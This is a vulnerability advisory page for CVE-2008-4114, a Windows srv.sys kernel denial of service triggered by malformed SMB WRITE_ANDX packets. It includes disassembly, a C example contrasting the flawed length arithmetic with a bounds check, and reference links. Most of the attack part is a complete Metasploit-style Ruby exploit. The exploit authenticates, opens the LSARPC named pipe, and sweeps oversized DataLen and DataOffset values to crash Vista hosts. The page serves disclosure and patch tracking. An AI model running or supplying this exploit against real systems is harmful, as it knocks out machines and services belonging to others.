Microsoft Windows SMB WRITE_ANDX Handling Denial of Service Vulnerability

Vulnerability ID: 1116119    Vulnerability type: Resource management error
Published: 2008-09-15    Updated: 2009-01-27
CVE number: CVE-2008-4114    CNNVD ID: CNNVD-200809-231
Platform: Windows    CVSS score: 7.1
|Vulnerability sources
https://www.exploit-db.com/exploits/6463
https://www.securityfocus.com/bid/31179
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-231
|Vulnerability details
Windows is a very popular operating system released by Microsoft.

The way the srv.sys driver in Windows handles malformed WRITE_ANDX SMB packets contains a kernel denial-of-service vulnerability. If an unauthenticated remote attacker can send a WRITE_ANDX packet to an interface that uses a named-pipe endpoint, this vulnerability can be triggered.

srv.sys is the driver that handles SMB packets. Once a packet has been parsed, it is routed through the appropriate driver. This is how srv.sys parses some of the important fields of the packet:

Module: srv.sys Vista SP1
PAGE:00048583 movzx ecx, word ptr [ebx+17h] ; Packet.DataOffset
PAGE:00048587 mov [ebp+var_50], ecx
PAGE:0004858A mov eax, [esi+78h] ; Packet
PAGE:0004858D add eax, ecx ; Packet.Data[]
PAGE:0004858F mov [ebp+VirtualAddress], eax
PAGE:00048592 mov eax, [esi+6Ch]
PAGE:00048595 mov eax, [eax+10h]
PAGE:00048598 sub eax, ecx ; Real packet len - DataOffset
PAGE:0004859A movzx edi, word ptr [ebx+15h] ; Packet.DataLen
PAGE:0004859E cmp edi, eax
PAGE:000485A0 jb short loc_485A4
PAGE:000485A2 mov edi, eax

In this piece of code the driver should add a check so that it does not continue when the offset is inconsistent with the real size of the packet. srv.sys then builds (or reuses) a FILE_SYSTEM_CONTROL IRP (0xD) with IOCTL 0x119FF8 (FSCTL_PIPE_INTERNAL_WRITE, METHOD_BUFFERED) and sends this IRP to the correct driver by calling IofCallDriver. The IRP contains the packet, but once the packet's internal fields are taken into account this does not mean that the IRP is consistent in terms of memory usage.

Module: srv.sys Vista SP1
PAGE:00048C90 push ebx
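The following is an added C example, not code from the page or from srv.sys, that reproduces the arithmetic of the PAGE:00048583 block in plain C and places beside it the consistency check the text says is missing. It reads DataLen and DataOffset at the offsets the disassembly annotates ([ebx+15h] and [ebx+17h]) from a constructed WRITE_ANDX parameter block; the struct, function and macro names (write_andx_fields, srv_style_data_len, checked_data_len, parse_write_andx, check_packet) are this example's own, and the sample packet lengths are constructed.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offsets of the two fields inside the WRITE_ANDX parameter block, as the
 * disassembly reads them: DataLen at [ebx+15h], DataOffset at [ebx+17h].
 * Names below are this example's own, not srv.sys's definitions. */
#define WRITE_ANDX_DATALEN_OFF    0x15
#define WRITE_ANDX_DATAOFFSET_OFF 0x17
#define WRITE_ANDX_MIN_PARAMS     (WRITE_ANDX_DATAOFFSET_OFF + 2)

struct write_andx_fields {
    uint16_t data_len;     /* Packet.DataLen    */
    uint16_t data_offset;  /* Packet.DataOffset */
};

static uint16_t le16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Pull the two fields out of a raw parameter block.
 * Returns 0 if the block is too short to contain them, 1 on success. */
int parse_write_andx(const uint8_t *params, size_t params_len,
                     struct write_andx_fields *out)
{
    if (params == NULL || out == NULL || params_len < WRITE_ANDX_MIN_PARAMS)
        return 0;
    out->data_len    = le16(params + WRITE_ANDX_DATALEN_OFF);
    out->data_offset = le16(params + WRITE_ANDX_DATAOFFSET_OFF);
    return 1;
}

/* Arithmetic as the PAGE:00048583 block does it: "remaining" is a plain
 * subtraction, and DataLen is only clamped by an unsigned compare
 * (cmp edi, eax / jb).  When DataOffset exceeds the real length the
 * subtraction wraps, the compare passes, and the oversized DataLen survives. */
uint32_t srv_style_data_len(uint32_t real_packet_len, const struct write_andx_fields *f)
{
    uint32_t remaining = real_packet_len - f->data_offset;   /* may wrap */
    uint32_t len = f->data_len;
    if (!(len < remaining))          /* jb short: clamp only when DataLen >= remaining */
        len = remaining;
    return len;
}

/* Hardened form: the consistency check the text says is missing.  DataOffset
 * must fall inside the bytes actually received, so the subtraction cannot
 * wrap; DataLen is then clamped exactly as the driver already does.
 * Returns -1 when the packet should be rejected. */
int64_t checked_data_len(uint32_t real_packet_len, const struct write_andx_fields *f)
{
    if (f->data_offset > real_packet_len)
        return -1;                                   /* offset points past the packet */
    uint32_t remaining = real_packet_len - f->data_offset;
    return (f->data_len < remaining) ? f->data_len : remaining;
}

/* Parse then check, for a packet whose real on-the-wire length is real_packet_len. */
int64_t check_packet(const uint8_t *params, size_t params_len, uint32_t real_packet_len)
{
    struct write_andx_fields f;
    if (!parse_write_andx(params, params_len, &f))
        return -1;
    return checked_data_len(real_packet_len, &f);
}

/* Constructed sample: a parameter block with everything zero except the two
 * fields of interest, written little-endian. */
static void build_params(uint8_t *params, uint16_t data_len, uint16_t data_offset)
{
    memset(params, 0, WRITE_ANDX_MIN_PARAMS);
    params[WRITE_ANDX_DATALEN_OFF]        = (uint8_t)(data_len & 0xff);
    params[WRITE_ANDX_DATALEN_OFF + 1]    = (uint8_t)(data_len >> 8);
    params[WRITE_ANDX_DATAOFFSET_OFF]     = (uint8_t)(data_offset & 0xff);
    params[WRITE_ANDX_DATAOFFSET_OFF + 1] = (uint8_t)(data_offset >> 8);
}

int main(void)
{
    uint8_t params[WRITE_ANDX_MIN_PARAMS];
    struct write_andx_fields f;

    /* Well-formed: 100-byte packet, data at offset 60, 40 bytes of data. */
    build_params(params, 40, 60);
    parse_write_andx(params, sizeof params, &f);
    printf("well-formed:  driver=%" PRIu32 " checked=%" PRId64 "\n",
           srv_style_data_len(100, &f), checked_data_len(100, &f));

    /* Inconsistent: DataLen and DataOffset of 0xFFFF in a 100-byte packet. */
    build_params(params, 0xffff, 0xffff);
    parse_write_andx(params, sizeof params, &f);
    printf("inconsistent: driver=%" PRIu32 " checked=%" PRId64 "\n",
           srv_style_data_len(100, &f), checked_data_len(100, &f));
    return 0;
}
```

The point of keeping both functions side by side is the wrap in srv_style_data_len: for the inconsistent case the driver-style arithmetic keeps DataLen at 0xFFFF and a data pointer 0xFFFF bytes past a 100-byte buffer, while checked_data_len rejects the packet before either value is used.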
|Exploit
require 'msf/core'

module Msf
module Exploits
module Test


class BugTest < Msf::Exploit::Remote


	include Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'test exploit',
			'Description'    => 	
				"tests",
			'Author'         => 'tests',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 0 $',
			'Arch'           => 'x86',
			'Payload'        =>
				{
					'Space' => 1000
				},
			'Targets'        => 
				[
					[
						'Windows VISTA',
						{
							'Platform' => 'win'
						}
					],
				],
			'DefaultTarget' => 0))
	end


	# Log in, open the named pipe, then send one WRITE_ANDX with the given
	# DataLenLow / DataOffset / filler size.
	def subexploit(dlenlow, doffset, fillersize)

		print_line("1")

		# Credentials and host name of the author's test setup
		datastore['SMBUser']='testuser'
		datastore['SMBPass']='testuser'
		datastore['SMBDomain']='COBAYA'
		datastore['SMBName']='COBAYA'

		print_line("2")

		connect()

		print_line("3")

		smb_login()

		print_line("4")

		# NT_CREATE_ANDX request that opens the LSARPC named pipe (UTF-16LE name below)
		pkt = CONST::SMB_CREATE_PKT.make_struct

		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0xc807

		pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
		pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
		pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
		pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i

		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX

		pkt['Payload']['SMB'].v['WordCount'] = 24
		
		pkt['Payload'].v['AndX'] = 255
		pkt['Payload'].v['AndXOffset'] = 0xdede
		pkt['Payload'].v['FileNameLen'] = 14
		pkt['Payload'].v['CreateFlags'] = 0x16
		pkt['Payload'].v['AccessMask'] = 0x2019f  # Maximum Allowed
		pkt['Payload'].v['ShareAccess'] = 7
		pkt['Payload'].v['CreateOptions'] = 0x400040
		pkt['Payload'].v['Impersonation'] = 2       
		pkt['Payload'].v['Disposition'] = 1
		pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"


		simple.client.smb_send(pkt.to_s)

		print_line("5")

		ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)
		
		# WRITE_ANDX request against the pipe handle just opened. dlenlow and doffset
		# are the DataLen / DataOffset fields that srv.sys does not check against the
		# real packet size (see the disassembly above).
		pkt = CONST::SMB_WRITE_PKT.make_struct

		data_offset = pkt.to_s.length - 4

		print_line("6")
		
		filler = Rex::Text.rand_text(fillersize)

		print_line("7")

		pkt['Payload']['SMB'].v['Signature1']=0xcccccccc
		pkt['Payload']['SMB'].v['Signature2']=0xcccccccc
		pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
		pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
		pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
		pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0xc807
		pkt['Payload']['SMB'].v['WordCount'] = 14
		pkt['Payload'].v['AndX'] = 255
		pkt['Payload'].v['AndXOffset'] = 0xdede
		pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']
		pkt['Payload'].v['Offset'] = 0
		pkt['Payload'].v['Reserved2'] = -1
		pkt['Payload'].v['WriteMode'] = 8
		pkt['Payload'].v['Remaining'] = fillersize
		pkt['Payload'].v['DataLenHigh'] = 0
		pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
		pkt['Payload'].v['DataOffset'] = doffset #<====
		pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
		pkt['Payload'].v['ByteCount'] = fillersize#<====
		pkt['Payload'].v['Payload'] = filler

		print_line("8")
		
		simple.client.smb_send(pkt.to_s)
		
		print_line("9")

	end

	# Sweep DataLenLow and DataOffset downward from 0xFFFF in steps of 10000 with a
	# fixed filler size, continuing past any error raised by a single attempt.
	def exploit

		k=72
		j=0xffff
		while j>10000
			i=0xffff
			while i>10000
				begin
					print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")
					subexploit(i,j,k)
				rescue
					print_line("rescue")
				end
				i=i-10000
			end
			j=j-10000
		end
		
	end

end

end
end
end

# milw0rm.com [2008-09-15]
|Affected products
Nortel Networks Self-Service WVADS 0 Nortel Networks Self-Service VoiceXML 0 Nortel Networks Self-Service Speech Server 0 Nortel Networks Self-Service Peri Workstation 0 Nortel Networks S
|References

Source: US-CERT:TA09-013A
Name: TA09-013A
Link: http://www.us-cert.gov/cas/techalerts/TA09-013A.html
Source: MS
Name: MS09-001; Patch Information
Link: http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx
Source: XF
Name: win-writeandx-dos(45146)
Link: http://xforce.iss.net/xforce/xfdb/45146
Source: MISC
Link: http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm
Source: SECTRACK
Name: 1020887
Link: http://www.securitytracker.com/id?1020887
Source: BID
Name: 31179
Link: http://www.securityfocus.com/bid/31179
Source: BUGTRAQ
Name: 20080914 Microsoft Windows WRITE_ANDX SMB command handling Kernel DoS
Link: http://www.securityfocus.com/archive/1/archive/1/496354/100/0/threaded
Source: MISC
Link: http://www.reversemode.com/index.php?option=com_content&task=view&id=54&Itemid=1
Source: MILW0RM
Name: 6463
Link: http://www.milw0rm.com/exploits/6463
Source: VUPEN
Name: ADV-2008-2583
Link: http://www.frsirt.com/english/advisories/2008/2583
Source: SECUNIA
Name: 31883
Link: http://secunia.com/advisories/31883
Source: OVAL
Name: oval:org.mitre.oval:def:6044
Link: http://oval.mitre.org/repository/data/getDef?id=oval:or